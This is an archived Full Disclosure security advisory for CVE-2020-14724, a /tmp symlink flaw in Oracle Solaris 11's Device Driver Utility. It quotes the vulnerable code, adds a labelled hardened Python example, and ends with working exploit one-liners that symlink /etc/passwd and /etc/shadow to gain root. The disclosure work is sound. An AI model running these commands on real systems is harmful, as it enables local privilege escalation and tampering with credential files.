Message-ID: <1A0AAEA8-B74F-4CB2-BDFB-22EBF975D7BD@me.com>
Date: Wed, 15 Jul 2020 00:02:52 -0400
From: "Larry W. Cashdollar via Fulldisclosure" <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Author: Larry W. Cashdollar, @_larry0
Date: 2020-02-02
CVE-2020-14724
Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html
Vendor: Oracle, fixed in July 14 2020 CPU https://www.oracle.com/security-alerts/cpujul2020.html.
Vendor Notified: 2020-02-02
Vendor Contact: secalert_us@...cle.com
Advisory: http://www.vapidlabs.com/advisory.php?v=212
Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."
Vulnerability:
Append contents of ddu_log to system files via symlink attack:
In ./ddu-text/utils/ddu-text.py
18: LOG_LOCATION = "/tmp/ddu_log"
45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION
50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL,
Elevation of privileges via symlink attack due to chmod operation on /tmp file:
In file ./ddu-text/utils/inner_window.py
667: logfile = open('/tmp/ddu_err.log', 'a')
695: logfile = open('/tmp/ddu_err.log', 'a')
721: logfile = open('/tmp/ddu_err.log', 'a')
748: logfile = open('/tmp/ddu_err.log', 'a')
In file ./scripts/comp_lookup.sh
33:typeset err_log=/tmp/ddu_err.log
In file ./scripts/det_info.sh
38:typeset err_log=/tmp/ddu_err.log
In file ./scripts/pkg_relate.sh
449:typeset err_log=/tmp/ddu_err.log
In file ./scripts/find_media.sh
20:typeset err_log=/tmp/ddu_err.log
There is a race condition between file creation and the chmod 666 call: a local user can run a simple script that re-creates the symlink as soon as the ddu_err.log file is removed:
In file ./scripts/probe.sh
569: # Make /tmp/ddu_err.log writable for every user
571: if [ -f /tmp/ddu_err.log ]; then
572: pfexec chmod 666 /tmp/ddu_err.log
574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log
636:typeset err_log=/tmp/ddu_err.log
These are also potential file-clobbering issues, from probe.sh:
131: NIC_info_file=/tmp/dvt_network_info_file
133: temp_file=/tmp/dvt_network_temp
134: temp_file_2=/tmp/dvt_network_temp_2
207: c_file=/tmp/str_ctrl_file
208: c_file1=/tmp/str_ctrl_file_1
209: c_file2=/tmp/str_ctrl_file_2
210: c_file3=/tmp/str_ctrl_file_3
211: c_file4=/tmp/str_ctrl_file_4
212: c_file5=/tmp/str_ctrl_file_5
328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile
329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile
330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1
398: temp_file1=/tmp/dvt_tmp_file1
399: temp_file2=/tmp/dvt_tmp_file2
462: cpu_tmpfile=/tmp/cpu_tmpfile
490: memory_tmpfile=/tmp/memory_tmpfile
624:typeset ctl_file=/tmp/dvt_ctl_file
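A hardened way to create these logs, added here as an example (it is not the DDU project's code and does not reproduce the OpenIndiana patch; the function names are hypothetical): open the path with O_NOFOLLOW so a planted symlink is refused, keep the file 0600 instead of chmod 666, verify with fstat() the object actually opened, and put the log in a per-run private directory rather than at a fixed /tmp name.

```python
import errno
import os
import stat
import tempfile

# Hypothetical hardened replacement for the fixed /tmp/ddu_log and /tmp/ddu_err.log
# paths quoted in the advisory; example code, not the DDU project's own.

def open_log_safely(path, mode=0o600):
    """Open or create an append-only log without following symlinks, then
    check with fstat() the object actually opened (a swap between creation
    and the check cannot fool it). Raises OSError on anything suspicious."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW | os.O_CLOEXEC
    fd = os.open(path, flags, mode)  # ELOOP if path is a symlink
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise OSError(errno.EINVAL, "not a regular file", path)
        if st.st_uid != os.geteuid():
            raise OSError(errno.EPERM, "owned by another user", path)
        if st.st_mode & stat.S_IWOTH:
            raise OSError(errno.EPERM, "world-writable", path)
        if st.st_nlink != 1:
            raise OSError(errno.EMLINK, "unexpected hard links", path)
    except Exception:
        os.close(fd)
        raise
    return os.fdopen(fd, "a")

def private_log_path(name="ddu_log"):
    """A fresh 0700 per-run directory replaces the predictable /tmp name."""
    return os.path.join(tempfile.mkdtemp(prefix="ddu-"), name)

def log_mode(path):
    """Permission bits of the log as created (expected 0o600, never 0o666)."""
    return stat.S_IMODE(os.lstat(path).st_mode)

def symlink_is_refused():
    """Constructed scenario: a symlink planted at the log path is rejected."""
    work = tempfile.mkdtemp(prefix="ddu-demo-")
    victim = os.path.join(work, "victim")  # stands in for a protected system file
    open(victim, "w").close()
    link = os.path.join(work, "ddu_err.log")
    os.symlink(victim, link)
    try:
        open_log_safely(link)
    except OSError:
        return True
    return False
```

Passing the returned file object to logging.StreamHandler takes the place of logging.basicConfig(filename=LOG_LOCATION) in ddu-text.py.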
Exploit Code:
Tested on Solaris 11 x86
larry@...Sun:~$ uname -a
SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc
and
Open Indiana
root@...nindiana:/export/home/larry# uname -a
SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc
Append content to /etc/passwd
larry@...nindiana:/tmp$ ln -s /etc/passwd ddu_log
To get local root simply have ddu chmod 666 /etc/shadow
larry@...nindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done

A better exploit:
https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
Patches to OpenIndiana
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/